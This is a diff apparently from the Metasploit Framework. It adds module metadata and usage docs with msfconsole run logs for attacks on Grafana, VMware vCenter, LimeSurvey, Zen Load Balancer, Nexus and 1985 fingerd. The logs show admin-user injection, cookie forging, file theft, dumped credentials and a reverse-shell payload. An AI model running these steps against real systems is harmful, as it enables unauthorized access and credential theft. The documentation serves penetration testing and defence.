      "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/",
      "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1",
@@ -166574,7 +167471,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-14 15:54:44 +0000",
+    "mod_time": "2020-03-21 11:00:25 +0000",
    "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/ubiquiti_unifi_backup",
@@ -167021,6 +167918,39 @@
    },
    "needs_cleanup": null
  },
+  "post_multi/manage/screenshare": {
+    "name": "Multi Manage the screen of the target meterpreter session",
+    "fullname": "post/multi/manage/screenshare",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "timwr"
+    ],
+    "description": "This module allows you to view and control the screen of the target computer via\n          a local browser window. The module continually screenshots the target screen and\n          also relays all mouse and keyboard events to session.",
+    "references": [
+
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-04-22 18:50:05 +0000",
+    "path": "/modules/post/multi/manage/screenshare.rb",
+    "is_install_path": true,
+    "ref_name": "multi/manage/screenshare",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_multi/manage/set_wallpaper": {
    "name": "Multi Manage Set Wallpaper",
    "fullname": "post/multi/manage/set_wallpaper",
@@ -168645,6 +169575,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/gather/bloodhound": {
+    "name": "BloodHound Ingestor",
+    "fullname": "post/windows/gather/bloodhound",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h4ng3r <h4ng3r@computerpirate.me>"
+    ],
+    "description": "This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2018-10-16 17:53:02 +0000",
+    "path": "/modules/post/windows/gather/bloodhound.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/bloodhound",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/gather/cachedump": {
    "name": "Windows Gather Credential Cache Dump",
    "fullname": "post/windows/gather/cachedump",
@@ -169976,12 +170939,14 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "Nic Losby <blurbdust@gmail.com>"
+      "Nic Losby <blurbdust@gmail.com>",
+      "Kali-Team <kali-team@qq.com>"
    ],
    "description": "This module will find and decrypt stored TeamViewer passwords",
    "references": [
      "CVE-2019-18988",
-      "URL-https://whynotsecurity.com/blog/teamviewer/"
+      "URL-https://whynotsecurity.com/blog/teamviewer/",
+      "URL-https://www.cnblogs.com/Kali-Team/p/12468066.html"
    ],
    "platform": "Windows",
    "arch": "",
@@ -169989,7 +170954,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-02-07 10:07:41 +0000",
+    "mod_time": "2020-04-16 02:04:17 +0000",
    "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/teamviewer_passwords",
@@ -172905,6 +173870,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/execute_dotnet_assembly": {
+    "name": "Execute .net Assembly (x64 only)",
+    "fullname": "post/windows/manage/execute_dotnet_assembly",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "b4rtik"
+    ],
+    "description": "This module execute a .net assembly in memory. Reflectively load the dll that will host CLR, then\n          copy in memory the assembly that will be executed. Credits for Amsi bypass to Rastamouse (@_RastaMouse)",
+    "references": [
+      "URL-https://b4rtik.blogspot.com/2018/12/execute-assembly-via-meterpreter-session.html"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/post/windows/manage/execute_dotnet_assembly.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/execute_dotnet_assembly",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/forward_pageant": {
    "name": "Forward SSH Agent Requests To Remote Pageant",
    "fullname": "post/windows/manage/forward_pageant",
@@ -0,0 +1,55 @@
+## Vulnerable Application
+
+The following list shows the vulnerable versions of Grafana when configured for LDAP or OAuth:
+
+  1.  2.x 
+  2.  3.x
+  3.  4.x befroe 4.6.4
+  4.  5.x before 5.2.3
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ``use auxiliary/admin/http/grafana_auth_bypass``
+  3. Do: ``set username <username>`` or ``set cookie <cookie>`` 
+  5. Do: ``set version``
+  6. Do: ``set rhosts``
+  7. Do: ``set rport``
+  8. Do: ``run``
+
+## Scenarios
+
+  Example run against Grafana 3.x with username admin:
+
+```
+msf5 > use auxiliary/admin/http/grafana_auth_bypass 
+msf5 auxiliary(admin/http/grafana_auth_bypass) > show options 
+
+Module options (auxiliary/admin/http/grafana_auth_bypass):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   COOKIE                      no        Decrypt captured cookie
+   RHOSTS     127.0.0.1        yes       Address of target
+   RPORT      3000             yes       Port of target
+   SSL        false            yes       set SSL/TLS based connection
+   TARGETURI  /                no        Base URL of grafana instance
+   THREADS    1                yes       The number of concurrent threads
+   USERNAME                    no        Valid username
+   VERSION    5                yes       Grafana version: "2-4" or "5" (Accepted: 2-4, 5)
+
+msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
+RHOSTS => 192.168.202.3
+msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
+USERNAME => Administrator
+msf5 auxiliary(admin/http/grafana_auth_bypass) > run
+
+[*] Running for 192.168.202.3...
+[+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f
+[+] Set following cookies to get access to the grafana instance.
+[+] grafana_user=Administrator;
+[+] grafana_remember=a232b98b9365d3d8f7ce253adfb9779f1114131a68cc8cbb4a53ee6f5cb71acfbe25773e95db051021;
+[+] grafana_sess=4ecdc0c13ebca229;
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,120 @@
+## Vulnerable Application
+
+### Description
+
+This module bypasses LDAP authentication in VMware vCenter Server's
+vmdir service to add an arbitrary administrator user. Version 6.7
+prior to the 6.7U3f update is vulnerable.
+
+### Setup
+
+Tested in the wild. No setup notes available at this time, as setup will
+be specific to target environment.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Add
+
+Add an admin user to the vCenter Server.
+
+## Options
+
+### USERNAME
+
+Set this to the username for the new admin user.
+
+### PASSWORD
+
+Set this to the password for the new admin user.
+
+### ConnectTimeout
+
+You may configure the timeout for LDAP connects if necessary. The
+default is 10.0 seconds and should be more than sufficient.
+
+## Scenarios
+
+### VMware vCenter Server 6.7 virtual appliance on ESXi
+
+```
+msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
+
+Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   no        Password of admin user to add
+   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT     389              yes       The target port
+   USERNAME                   no        Username of admin user to add
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Add   Add an admin user
+
+
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
+rhosts => [redacted]
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
+username => msfadmin
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
+password => msfadmin
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
+[*] Running module against [redacted]
+
+[*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+dn: cn=DSE Root
+namingcontexts: dc=vsphere,dc=local
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
+supportedcontrol: 1.2.840.113556.1.4.417
+supportedcontrol: 1.2.840.113556.1.4.319
+supportedldapversion: 3
+supportedsaslmechanisms: GSSAPI
+
+[+] Discovered base DN: dc=vsphere,dc=local
+[*] Dumping LDAP data from vmdir service at [redacted]:389
+[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
+[*] Password and lockout policy:
+dn: cn=password and lockout policy,dc=vsphere,dc=local
+cn: password and lockout policy
+enabled: TRUE
+ntsecuritydescriptor:: [redacted]
+objectclass: top
+objectclass: vmwLockoutPolicy
+objectclass: vmwPasswordPolicy
+objectclass: vmwPolicy
+vmwpasswordchangeautounlockintervalsec: [redacted]
+vmwpasswordchangefailedattemptintervalsec: [redacted]
+vmwpasswordchangemaxfailedattempts: [redacted]
+vmwpasswordlifetimedays: [redacted]
+vmwpasswordmaxidenticaladjacentchars: [redacted]
+vmwpasswordmaxlength: [redacted]
+vmwpasswordminalphabeticcount: [redacted]
+vmwpasswordminlength: [redacted]
+vmwpasswordminlowercasecount: [redacted]
+vmwpasswordminnumericcount: [redacted]
+vmwpasswordminspecialcharcount: [redacted]
+vmwpasswordminuppercasecount: [redacted]
+vmwpasswordprohibitedpreviouscount: [redacted]
+
+[*] Bypassing LDAP auth in vmdir service at [redacted]:389
+[*] Adding admin user msfadmin with password msfadmin
+[+] Added user msfadmin, so auth bypass was successful!
+[+] Added user msfadmin to admin group
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >
+```
@@ -0,0 +1,78 @@
+## General Notes
+
+  This module imports an Ubiquiti Unifi configuration file into the database.
+  This is similar to `post/multi/gather/ubiquiti_unifi_backup` only access isn't required,
+  and assumes you already have the file.
+
+  This module is able to take a unf file, from the controller and perform the following actions:
+
+  1. Decrypt the file
+  2. Fix the zip file if a `zip` utility is on the system
+  3. Extract db.gz
+  4. Unzip the db file
+  5. Import the db file
+
+  Or simply pass the db file for import directly.
+
+## Verification Steps
+
+1. Have a Ubiquiti Unifi configuration file (db or unf)
+2. Start `msfconsole`
+3. `use auxiliary/admin/ubiquiti/ubiquiti_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.unf`
+6. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration unf or db file..
+
+## Scenarios
+
+### Unf File
+```
+resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
+resource (unifi_config.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (unifi_config.rb)> set config /root/.msf4/loot/20190825172544_default_1.1.1.1_ubiquiti.unifi.b_740136.unf
+config => /root/.msf4/loot/20190825172544_default_1.1.1.1_ubiquiti.unifi.b_740136.unf
+resource (unifi_config.rb)> run
+[*] Running module against 127.0.0.1
+[+] File DECRYPTED.  Still needs to be repaired
+[*] Attempting to repair zip file (this is normal and takes some time)
+[+] File DECRYPTED and REPAIRED and saved to /tmp/fixed_zip.zip20190825-6283-1merolj.
+[*] extracting db.gz
+[*] Converting config BSON to JSON
+[+] Admin user unifiadmin with email admin@unifi.com found with password hash $6$R6qnBHgF$CHYrf4t.fXu0pcoloju5a85m3ujrjJLhIO.lN1xZqHZPQoUXXsJB98jgtsvt4Qo2/8t3epzbVLiba7Ls7GCVxcV.
+[+] Radius server: 1.1.1.1:1812 with secret ''
+[+] Mesh Wifi Network vwire-111117d211c1c1ea password 113b9b872b1114a9111f1a11ae11cdfe
+[+] SSH user admin found with password lyxGYOF9UalubyyG and hash $6$37uelU/k$EkJuteQiAIP.CrRaJj4xC9gt61n95FJP3fQuQQmE9TqtFKtmIGsV5XSIJI.muBLOMKMkdlsPl8E3BvjJit.F21
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+### db File
+
+```
+resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
+resource (unifi_config.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > set config /root/.msf4/loot/db
+config => /root/.msf4/loot/db
+msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Converting config BSON to JSON
+[+] Admin user unifiadmin with email admin@unifi.com found with password hash $6$R6qnBHgF$CHYrf4t.fXu0pcoloju5a85m3ujrjJLhIO.lN1xZqHZPQoUXXsJB98jgtsvt4Qo2/8t3epzbVLiba7Ls7GCVxcV.
+[+] Radius server: 1.1.1.1:1812 with secret ''
+[+] Mesh Wifi Network vwire-111117d211c1c1ea password 113b9b872b1114a9111f1a11ae11cdfe
+[+] SSH user admin found with password lyxGYOF9UalubyyG and hash $6$37uelU/k$EkJuteQiAIP.CrRaJj4xC9gt61n95FJP3fQuQQmE9TqtFKtmIGsV5XSIJI.muBLOMKMkdlsPl8E3BvjJit.F21
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
@@ -0,0 +1,101 @@
+## Vulnerable Application
+
+### Description
+
+This module uses an anonymous-bind LDAP connection to dump data from
+the vmdir service in VMware vCenter Server version 6.7 prior to the
+6.7U3f update.
+
+### Setup
+
+Tested in the wild. No setup notes available at this time, as setup will
+be specific to target environment.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+Dump all LDAP data from the vCenter Server.
+
+## Options
+
+### ConnectTimeout
+
+You may configure the timeout for LDAP connects if necessary. The
+default is 10.0 seconds and should be more than sufficient.
+
+## Scenarios
+
+### VMware vCenter Server 6.7 virtual appliance on ESXi
+
+```
+msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
+
+Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT   389              yes       The target port
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
+rhosts => [redacted]
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
+[*] Running module against [redacted]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+dn: cn=DSE Root
+namingcontexts: dc=vsphere,dc=local
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
+supportedcontrol: 1.2.840.113556.1.4.417
+supportedcontrol: 1.2.840.113556.1.4.319
+supportedldapversion: 3
+supportedsaslmechanisms: GSSAPI
+
+[+] Discovered base DN: dc=vsphere,dc=local
+[*] Dumping LDAP data from vmdir service at [redacted]:389
+[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
+[*] Password and lockout policy:
+dn: cn=password and lockout policy,dc=vsphere,dc=local
+cn: password and lockout policy
+enabled: TRUE
+ntsecuritydescriptor:: [redacted]
+objectclass: top
+objectclass: vmwLockoutPolicy
+objectclass: vmwPasswordPolicy
+objectclass: vmwPolicy
+vmwpasswordchangeautounlockintervalsec: [redacted]
+vmwpasswordchangefailedattemptintervalsec: [redacted]
+vmwpasswordchangemaxfailedattempts: [redacted]
+vmwpasswordlifetimedays: [redacted]
+vmwpasswordmaxidenticaladjacentchars: [redacted]
+vmwpasswordmaxlength: [redacted]
+vmwpasswordminalphabeticcount: [redacted]
+vmwpasswordminlength: [redacted]
+vmwpasswordminlowercasecount: [redacted]
+vmwpasswordminnumericcount: [redacted]
+vmwpasswordminspecialcharcount: [redacted]
+vmwpasswordminuppercasecount: [redacted]
+vmwpasswordprohibitedpreviouscount: [redacted]
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
+```
@@ -0,0 +1,134 @@
+## Vulnerable Application
+
+This module exploits an authenticated path traversal vulnerability found in LimeSurvey versions between 4.0 and 4.1.11 with
+CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960, inclusive.
+
+In CVE-2020-11455 the `getZipFile` function within the `filemanager` functionality allows for arbitrary file download. The file retrieved
+may be deleted after viewing.
+
+In CVE-2019-9960 the `szip` function within the `downloadZip` functionality allows for arbitrary file download.
+
+This module has been verified against the following versions:
+
+  * 4.1.11-200316
+  * 3.15.0-181008
+  * 3.9.0-180604
+  * 3.6.0-180328
+  * 3.0.0-171222
+  * 2.70.0-170921
+
+### Install
+
+This application is straight forward to install.  An excellent writeup is available on
+[howtoforge.com](https://www.howtoforge.com/tutorial/how-to-install-limesurvey-on-ubuntu-1804/)
+
+Versions can be downloaded from [github](https://github.com/LimeSurvey/LimeSurvey/releases).
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/limesurvey_zip_traversals```
+  4. Do: ```set file [file]```
+  5. Do: ```set rhosts [ip]```
+  6. Do: ```run```
+  7. If the file is readable, you should retrieve a file from the application
+
+## Options
+
+### FILE
+
+The file to attempt to retrieve
+
+## Scenarios
+
+### LimeSurvey 4.1.11, 3.15.0, 3.9.0, 3.6.0, 3.0.0, and 2.70.0 on Ubuntu 18.04
+
+```
+[*] Processing lime41.rb for ERB directives.
+resource (lime41.rb)> use auxiliary/scanner/http/limesurvey_zip_traversals
+resource (lime41.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (lime41.rb)> set verbose true
+verbose => true
+resource (lime41.rb)> set targeturi /LimeSurvey-4.1.11-200316/
+targeturi => /LimeSurvey-4.1.11-200316/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => SzF-eUl4RW1lU0h-aFZxWmNwbGZOREJrYUduZzI1WTaGH7eqrOmgcse5liKfPNZ8qqKkvenm5Fu6oxTSyVWDrQ==
+[+] Login Successful
+[*] Version Detected: 4.1.11
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.15.0-181008/
+targeturi => /LimeSurvey-3.15.0-181008/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => SDNyc21VYXJONmIwbjFkOENmUzEyS1NMX3lPQ0VYRTJyfE0iGABAxOsuZhxGdZd59W3dNCVx2D6JABRxmu6dgw==
+[+] Login Successful
+[*] Version Detected: 3.15.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.9.0-180604/
+targeturi => /LimeSurvey-3.9.0-180604/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => QldPa0lZM0o0cUV-STU4NWVoYVlDdHNtYmhmVVl6NW39a1wvfep0Ccsuz_gx9V1AnMjtADnprALM7qwvxUz3Wg==
+[+] Login Successful
+[*] Version Detected: 3.9.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.6.0-180328/
+targeturi => /LimeSurvey-3.6.0-180328/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => SHJzSk81ak5rdWdONTJWV0VLQTlHcjRKeGNIaFlYREqfcU-BuMlPRimIHJipKDsrCF3i7j29J4bNFwxsYGD42A==
+[+] Login Successful
+[*] Version Detected: 3.6.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.0.0-171222/
+targeturi => /LimeSurvey-3.0.0-171222/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => T1VkbDlhYU9IbkZHel9wd0JoVVl5RTUxQ2h2Mk9yN0-AXAtaTDCOMX8gWru7EmBHPBumgY0FG0vAFLwCwyeeuA==
+[+] Login Successful
+[*] Version Detected: 3.0.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-2.70.0-170921/
+targeturi => /LimeSurvey-2.70.0-170921/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => elhvTzJaWGlJWU10WnBFajlTYmN5a1VHY1M0bDNJd1C2okYXL__0in7KMlmwY6_Iuk8sI7H7s2zQPZ5NiWW_Xg==
+[+] Login Successful
+[*] Version Detected: 2.70.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> md5sum ~/.msf4/loot/*
+[*] exec: md5sum ~/.msf4/loot/*
+
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
+msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+[*] exec: cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+...snip...
+mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
+```
@@ -0,0 +1,34 @@
+## Description
+
+Zen load balancer before v3.10.1 is vulnerable to authenticated directory traversal. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path.
+
+## Vulnerable Application
+
+[Vulnerable ISO](https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `set RHOSTS <rhost>`
+3. `set RPORT <rport>`
+4. `set FILEPATH <filepath>`
+5. `set ssl <true/false>`
+6. `set HttpPassword <admin>`
+7. `set HttpUsername <admin>`
+5. `run`
+
+## Scenarios
+
+```
+msf5 > use auxiliary/scanner/http/zenload_balancer_traversal 
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101
+RHOSTS => 192.168.1.101
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true 
+SSL => true
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run
+[*] Running module against 192.168.1.101
+
+[+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) >
+```
@@ -17,26 +17,24 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-### Targets
-
-```
-Id  Name
--  ----
-0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-```
-
 ## Verification Steps

 Follow [Setup](#setup) and [Scenarios](#scenarios).

+## Targets
+
+### 0
+
+This targets `fingerd` version 5.1 from 1985-06-06.
+
 ## Options

-**RPORT**
+### RPORT

 Set this to the target port. The default is 79 for `fingerd`, but the
 port may be forwarded when NAT (SLiRP) is used in SIMH.

-**PAYLOAD**
+### PAYLOAD

 Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.
@@ -47,13 +45,14 @@ Set this to a BSD VAX payload. Currently, only

 ```
 msf5 > use exploit/bsd/finger/morris_fingerd_bof
-msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing
+msf5 exploit(bsd/finger/morris_fingerd_bof) > options

 Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT   79               yes       The target port (TCP)


 Payload options (bsd/vax/shell_reverse_tcp):
@@ -61,6 +60,15 @@ Payload options (bsd/vax/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
+

 msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java Expression Language (EL) injection in
+Nexus Repository Manager versions up to and including 3.21.1 to
+execute code as the Nexus user.
+
+This is a post-authentication vulnerability, so credentials are
+required to exploit the bug. Any user regardless of privilege level
+may be used.
+
+Tested against 3.21.1-01.
+
+### Setup
+
+Install Docker using the [official instructions](https://docs.docker.com/get-docker/).
+Follow the instructions for your platform and distribution (if using
+Linux). If you're using OS X, you may prefer to `brew cask install docker`
+after installing [Homebrew](https://brew.sh/).
+
+#### Starting the application
+
+Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.1`
+(note the added `3.21.1` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
+
+Open a browser and go to <http://localhost:8081/>. If you're greeted by
+the Nexus page, then the application has started successfully.
+
+#### Changing the admin user's password
+
+Run `docker exec nexus cat /nexus-data/admin.password` to get the admin
+password. Sign in as the `admin` user with the password you just
+retrieved.
+
+Follow the prompts in the wizard. Change the password to something you
+can remember. You can click through the anonymous access question, since
+it's not relevant to the exploit. You don't need to enable the feature.
+
+If you have trouble getting the password change to stick, wait a couple
+minutes or browse to <http://localhost:8081/#user/account> and change it
+again.
+
+#### Adding an unprivileged user
+
+1. Browse to <http://localhost:8081/#admin/security/users>
+2. Click `Create local user` on the current page
+3. Fill in all the required fields
+  * You can set a fake e-mail address like `user@example.com`
+  * Make sure you set a password you can remember, since you'll be using
+    it to test the module
+  * It is **critical** that you set the `Status` field to `Active` and
+    move the `nx-anonymous` role to the `Granted` column
+4. Click `Create local user` on the current page
+5. Sign out the `admin` account and test your new login
+
+After completing these steps, you may now test the module.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This targets Nexus Repository Manager versions <= 3.21.1.
+
+## Options
+
+### USERNAME
+
+Set this to a valid Nexus username. It can be an unprivileged user, but
+it defaults to `admin` because that is a known account.
+
+### PASSWORD
+
+Set this to a valid Nexus password. No default, since the `admin` user's
+password is randomized on install.
+
+## Scenarios
+
+### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
+
+```
+msf5 > use exploit/linux/http/nexus_repo_manager_el_injection
+msf5 exploit(linux/http/nexus_repo_manager_el_injection) > options
+
